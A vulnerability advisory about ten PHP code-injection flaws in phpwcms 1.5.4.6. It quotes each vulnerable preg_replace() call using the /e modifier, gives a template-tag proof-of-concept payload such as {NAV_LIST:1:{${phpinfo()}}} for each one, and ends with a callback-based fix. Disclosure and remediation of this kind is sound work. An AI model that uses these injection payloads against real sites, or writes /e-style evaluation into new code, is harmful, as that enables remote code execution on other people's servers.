phpwcms 'preg_replace()' multiple remote PHP code injection vulnerabilities

2012-12-21T00:00:00
ID MYHACK58:62201236296
Type myhack58
Reporter Anonymous
Modified 2012-12-21T00:00:00

Description

phpwcms is an open source content management system.

phpwcms 1.5.4.6 and other versions contain multiple code injection vulnerabilities in their implementation. An authenticated remote attacker with a "backend user" or "admin user" account can exploit these vulnerabilities to execute arbitrary PHP script code on the affected computer; a "frontend user" account cannot exploit them.

Test method:

1. Lines 699-700 of ./include/inc_front/content.func.inc.php:

-------------------------------------------------------------

// list based navigation starting at given level

$replace = 'nav_list_struct($content["struct"],$content["cat_id"],"$1", "$2");';

$content["all"] = preg_replace('/\{NAV_LIST:(\d+):{0,1}(.*){0,1}\}/e', $replace, $content["all"]);

PoC:

{NAV_LIST:1:{${phpinfo()}}}

2. Line 704 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{NAV_LIST_TOP:(.*?):(.*?)\}/e', 'css_level_list($content["struct"], $content["cat_path"], 0, "$1", 1, "$2")', $content["all"]);

PoC:

{NAV_LIST_TOP:{${phpinfo}}:1}

3. Line 708 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{NAV_LIST_CURRENT:(\d+):(.*?):(.*?)\}/e', 'css_level_list($content["struct"],$content["cat_path"],$content["cat_id"],"$2","$1","$3")', $content["all"]);

PoC:

{NAV_LIST_CURRENT:1:{${phpinfo()}}:1}

4. Line 792 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{BROWSE:NEXT:(.*?):(0|1)\}/e','get_index_link_next("$1",$2);',$content["all"]);

PoC:

{BROWSE:NEXT:{${phpinfo()}}:1}

5. Line 793 of ./include/inc_front/content.func.inc.php:

--------------------------------------------------------

$content["all"] = preg_replace('/\{BROWSE:PREV:(.*?):(0|1)\}/e','get_index_link_prev("$1",$2);',$content["all"]);

PoC:

{BROWSE:PREV:{${phpinfo()}}:1}

6. Line 2661 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{LIVEDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$livedate.'")', $text);

PoC:

{LIVEDATE:{${phpinfo()}} lang=ru}

7. Line 2658 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{DATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text);

PoC:

{DATE:{${phpinfo()}} lang=ru}

8. Line 2665 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

$text = preg_replace('/\{KILLDATE:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$killdate.'")', $text);

PoC:

{KILLDATE:{${phpinfo()}} lang=ru}

9. Line 2668 of ./include/inc_front/front.func.inc.php:

-------------------------------------------------------

return preg_replace('/\{NOW:(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'. now().'")', $text);

PoC:

{NOW:{${phpinfo()}} lang=ru}

10. Line 2674 of ./include/inc_front/front.func.inc.php:

--------------------------------------------------------

$text = preg_replace('/\{'.$rt.':(.*?) lang=(..)\}/e', 'international_date_format("$2","$1","'.$date.'")', $text);

PoC:

{DATE:{${phpinfo()}} lang=ru}

Safety recommendations:

The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.phpwcms.de/
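
All ten call sites above share one defect: the `/e` modifier makes PHP evaluate the replacement string as code after the captured text has been substituted into it. The following is an added example, not phpwcms code and not a vendor patch: it handles the `{BROWSE:...}` and `{DATE:...}` tags with `preg_replace_callback_array()`, so captures reach the handler only as string data. The `demo_*` helpers, their bodies, the `render_tags()` name and the timestamp are hypothetical stand-ins for the project's own functions and values.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-ins for the phpwcms helpers; names and bodies are assumptions.
function demo_index_link(string $dir, string $label, int $mode): string
{
    return sprintf('<a rel="%s" data-mode="%d">%s</a>', $dir, $mode,
        htmlspecialchars($label, ENT_QUOTES, 'UTF-8'));
}

function demo_date_format(string $lang, string $format, int $ts): string
{
    // This sketch honours only d, m, Y and simple separators in the format.
    $format = preg_replace('~[^dmY./ -]~', '', $format);
    return $lang . ':' . gmdate($format, $ts);
}

function render_tags(string $html, int $ts): string
{
    // No /e modifier: each capture reaches its handler as a plain string
    // in $m and is never compiled or interpolated as PHP source.
    $handlers = [
        '/\{BROWSE:(NEXT|PREV):(.*?):(0|1)\}/' =>
            static fn(array $m): string =>
                demo_index_link(strtolower($m[1]), $m[2], (int) $m[3]),
        '/\{DATE:(.*?) lang=(..)\}/' =>
            static fn(array $m): string =>
                demo_date_format($m[2], $m[1], $ts),
    ];
    // Returns null on a PCRE error; fall back to the unmodified input.
    return preg_replace_callback_array($handlers, $html) ?? $html;
}

// Constructed sample input: two ordinary tags, then the PoC strings from
// items 4 and 7 above, which are now treated purely as data.
$samples = [
    'Go {BROWSE:NEXT:next page:1}',
    'Posted {DATE:d.m.Y lang=ru}',
    'Go {BROWSE:NEXT:{${phpinfo()}}:1}',
    'Posted {DATE:{${phpinfo()}} lang=ru}',
];
foreach ($samples as $s) {
    echo render_tags($s, 1356048000), PHP_EOL; // constructed timestamp
}
```

The `/e` modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so callback-based replacement is also what these call sites need in order to run on current PHP.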